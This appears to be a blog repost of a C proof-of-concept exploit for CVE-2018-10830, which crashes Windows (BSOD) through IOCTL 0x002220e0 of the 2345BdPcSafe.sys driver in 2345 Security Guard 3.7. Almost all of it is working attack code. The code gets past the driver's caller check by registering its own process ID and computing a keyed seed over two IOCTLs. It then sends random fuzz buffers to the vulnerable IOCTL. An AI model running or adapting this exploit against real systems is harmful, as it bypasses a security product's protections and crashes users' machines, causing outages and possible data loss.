Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86375800

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: [BSOD  by IOCTL 0x002220e0 in 2345BdPcSafe.sys  of 2345 Security Guard 3.7]
# Date: [20180509]
# Exploit Author: [anhkgg]
# Vendor Homepage: [http://safe.2345.cc/]
# Software Link: [http://dl.2345.cc/2345pcsafe/2345pcsafe_v3.7.0.9345.exe]
# Version: [v3.7] (REQUIRED)
# Tested on: [Windows X64]
# CVE : [CVE-2018- 10830]

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

struct NETFW_IOCTL_ADD_PID
{
	DWORD pid;
	char seed[0x14];//4 + 14
};//0x18

#pragma pack(push)
#pragma pack(1)
struct NETFW_IOCTL_SET_PID
{
	BYTE set_state;//
	WORD buf_len;//1
	DWORD pid;//3
	char buf[0x64];//7
};//6B
#pragma pack(pop)

int __stdcall f_XOR__12A30(BYTE *a1, BYTE *a2)
{
	BYTE *a1_; // eax

	a1_ = a1;
	*a1_ ^= *a2;
	*a2 ^= *a1;
	*a1_ ^= *a2;
	return (int)a1_;
}

int __stdcall sub_12A80(char *a1, int len, char *a3)
{
	int result;
	unsigned __int8 v4;
	__int16 i;
	__int16 j;
	unsigned __int8 k;

	for (i = 0; i < 256; ++i)
		a3[i] = i;
	a3[256] = 0;
	a3[257] = 0;
	k = 0;
	v4 = 0;
	result = 0;
	for (j = 0; j < 256; ++j)
	{
		v4 += a3[j] + a1[k];
		f_XOR__12A30((BYTE*)&a3[j], (BYTE*)&a3[v4]);
		result = (k + 1) / len;
		k = (k + 1) % len;
	}
	return result;
}

char *__stdcall sub_12B60(char *a1, signed int len, char *a3)
{
	char *v3; // esi
	unsigned int v4; // ebx
	unsigned __int8 result; // al
	int v6; // edi
	char *v7; // ST18_4
	int v8; // [esp+14h] [ebp-8h]
	int v9; // [esp+18h] [ebp-4h]
	unsigned __int8 v10; // [esp+2Fh] [ebp+13h]

	v3 = a3;
	v4 = a3[256];
	result = a3[257];
	v9 = 0;
	if (len > 0)
	{
		v6 = (unsigned __int8)v4;
		v8 = 0;
		while (1)
		{
			v4 = (v6 + 1) & 0x800000FF;
			v6 = (unsigned __int8)v4;
			v10 = v3[(unsigned __int8)v4] + result;
			v7 = &v3[v10];
			f_XOR__12A30((BYTE*)&v3[(unsigned __int8)v4], (BYTE*)v7);
			a1[v8] ^= v3[(unsigned __int8)(v3[(unsigned __int8)v4] + *v7)];
			v8 = (signed __int16)++v9;
			if ((signed __int16)v9 >= len)
				break;
			result = v10;
		}
		result = v10;
	}
	v3[256] = v4;
	v3[257] = result;
	return (char *)result;
}

void calc_seed(char* seed, char* dst)
{
	char Source1[26] = { 0 };
	char a3[300] = { 0 };

	Source1[0] = 8;
	Source1[1] = 14;
	Source1[2] = 8;
	Source1[3] = 10;
	Source1[4] = 2;
	Source1[5] = 3;
	Source1[6] = 29;
	Source1[7] = 23;
	Source1[8] = 13;
	Source1[9] = 3;
	Source1[10] = 15;
	Source1[11] = 22;
	Source1[12] = 15;
	Source1[13] = 7;
	Source1[14] = 91;
	Source1[15] = 4;
	Source1[16] = 18;
	Source1[17] = 26;
	Source1[18] = 26;
	Source1[19] = 3;
	Source1[20] = 4;
	Source1[21] = 1;
	Source1[22] = 15;
	Source1[23] = 25;
	Source1[24] = 10;
	Source1[25] = 13;

	sub_12A80(seed, 0x14, a3);       
	sub_12B60(Source1, 0x1A, a3);
	memcpy(dst, Source1, 26);
}

BOOL BypassChk(HANDLE h)
{
	DWORD BytesReturned = 0;

	DWORD ctlcode = 0x222090;
	NETFW_IOCTL_ADD_PID add_pid = { 0 };
	add_pid.pid = GetCurrentProcessId();

	if (!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, NULL)) {
		printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
		return FALSE;
	}

	ctlcode = 0x222094;
	NETFW_IOCTL_SET_PID set_pid = { 0 };
	set_pid.pid = GetCurrentProcessId();
	set_pid.set_state = 1;

	calc_seed(add_pid.seed, set_pid.buf);
	set_pid.buf_len = 26;

	if (!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, NULL)) {
		printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
		return FALSE;
	}

	return TRUE;
}

HANDLE OpenDevice(char* path)
{
	return CreateFileA(path,
		GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
}

CHAR asciiString10[0x10];
CHAR asciiString100[0x100];
CHAR asciiString1000[0x1000];
WCHAR unicodeString10[0x10];
WCHAR unicodeString100[0x100];
WCHAR unicodeString1000[0x1000];
DWORD tableDwords[0x100];

DWORD FuzzConstants[] = {
	0x00000000, 0x00000001, 0x00000004, 0xFFFFFFFF,
	0x00001000, 0xFFFF0000, 0xFFFFFFFE, 0xFFFFFFF0,
	0xFFFFFFFC, 0x70000000, 0x7FFEFFFF, 0x7FFFFFFF,
	0x80000000,
	(DWORD)asciiString10,
	(DWORD)asciiString100,
	(DWORD)asciiString1000,
	(DWORD)unicodeString10,
	(DWORD)unicodeString100,
	(DWORD)unicodeString1000,
	(DWORD)tableDwords
};

/* Period parameters */
#define N 624
#define M 397
#define MATRIX_A 0x9908b0dfUL   /* constant vector a */
#define UPPER_MASK 0x80000000UL /* most significant w-r bits */
#define LOWER_MASK 0x7fffffffUL /* least significant r bits */

static unsigned long mt[N]; /* the array for the state vector  */
static int mti = N + 1; /* mti==N+1 means mt[N] is not initialized */

/* initializes mt[N] with a seed */
void init_genrand(unsigned long s)
{
	mt[0] = s & 0xffffffffUL;
	for (mti = 1; mti < N; mti++) {
		mt[mti] =
			(1812433253UL * (mt[mti - 1] ^ (mt[mti - 1] >> 30)) + mti);
		/* See Knuth TAOCP Vol2. 3rd Ed. P.106 for multiplier. */
		/* In the previous versions, MSBs of the seed affect   */
		/* only MSBs of the array mt[].                        */
		/* 2002/01/09 modified by Makoto Matsumoto             */
		mt[mti] &= 0xffffffffUL;
		/* for >32 bit machines */
	}
}

/* generates a random number on [0,0xffffffff]-interval */
unsigned long genrand_int32(void)
{
	unsigned long y;
	static unsigned long mag01[2] = { 0x0UL, MATRIX_A };
	/* mag01[x] = x * MATRIX_A  for x=0,1 */

	if (mti >= N) { /* generate N words at one time */
		int kk;

		if (mti == N + 1)   /* if init_genrand() has not been called, */
			init_genrand(5489UL); /* a default initial seed is used */

		for (kk = 0; kk < N - M; kk++) {
			y = (mt[kk] & UPPER_MASK) | (mt[kk + 1] & LOWER_MASK);
			mt[kk] = mt[kk + M] ^ (y >> 1) ^ mag01[y & 0x1UL];
		}
		for (; kk < N - 1; kk++) {
			y = (mt[kk] & UPPER_MASK) | (mt[kk + 1] & LOWER_MASK);
			mt[kk] = mt[kk + (M - N)] ^ (y >> 1) ^ mag01[y & 0x1UL];
		}
		y = (mt[N - 1] & UPPER_MASK) | (mt[0] & LOWER_MASK);
		mt[N - 1] = mt[M - 1] ^ (y >> 1) ^ mag01[y & 0x1UL];

		mti = 0;
	}

	y = mt[mti++];

	/* Tempering */
	y ^= (y >> 11);
	y ^= (y << 7) & 0x9d2c5680UL;
	y ^= (y << 15) & 0xefc60000UL;
	y ^= (y >> 18);

	return y;
}

unsigned long getrand(unsigned long min, unsigned long max)
{
	return (genrand_int32() % (max - min + 1)) + min;
}

//3.7.0.2860
int poc_2345NetFirewall()
{
	
	DWORD BytesReturned = 0;

	HANDLE h = OpenDevice("\\\\.\\2345BdPcSafe");
	if (h == INVALID_HANDLE_VALUE) {
		printf("[-] Open device error: %d\n", GetLastError());
		return 1;
	}

	if (!BypassChk(h)) {
		printf("[-] error!");
		return 1;
	}

	DWORD ctlcode = 0x002220e0;
	BYTE  bufInput[0x10000] = { 0 };
	BYTE  bufOutput[0x10000] = { 0 };

	srand(time(NULL));
	int count = 0;
	while (count++ < 1000) {
		// Choose a random length for the buffer
		size_t randomLength = getrand(4, 0x400);

		for (int i = 0; i < randomLength; i = i + 4) {
			int fuzzData = FuzzConstants[getrand(0, (sizeof(FuzzConstants) / 4) - 1)];

			// Choose a random element into FuzzConstants
			bufInput[i] = fuzzData & 0x000000ff;
			bufInput[i + 1] = (fuzzData & 0x0000ff00) >> 8;
			bufInput[i + 2] = (fuzzData & 0x00ff0000) >> 16;
			bufInput[i + 3] = (fuzzData & 0xff000000) >> 24;
		}

		DeviceIoControl(h,
			ctlcode,
			bufInput,
			randomLength,
			bufOutput,
			0,
			&BytesReturned,
			NULL);

		Sleep(10);
	}

	return 0;
}

int main()
{
	poc_2345NetFirewall();

	printf("poc failed!\n");

	getchar();
		
	return 0;
}